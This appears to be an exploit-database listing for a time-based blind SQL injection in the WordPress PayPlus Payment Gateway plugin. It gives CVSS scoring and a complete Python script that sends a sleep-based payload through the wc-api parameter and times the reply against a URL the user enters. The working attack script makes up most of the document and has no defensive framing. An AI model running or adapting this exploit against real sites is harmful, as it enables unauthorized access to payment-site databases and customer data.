WordPress PayPlus Payment Gateway SQL Injection Exploit

2024-08-0700:00:00

j3r1ch0123

0day.today

wordpress

payplus

payment gateway

sql injection

exploit

security

vulnerability

python

requests

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.4

Confidence

Low

JSON

#!/usr/bin/env python3.11
import requests
import time

def exploit(url):
    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}

    start = time.time()
    with requests.Session() as session:
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
        })
        response = requests.get(url, params=payload)
        print(f"Exploiting {url}...")

        end = time.time()
        print(response.status_code)
        response_time = end - start
        print(f"Response time: {response_time}...")

if __name__ == "__main__":
    url = input("Enter the vulnerable URL (e.g., https://test.site): ")
    if not url.startswith("http"):
        url = "http://" + url
    exploit(url)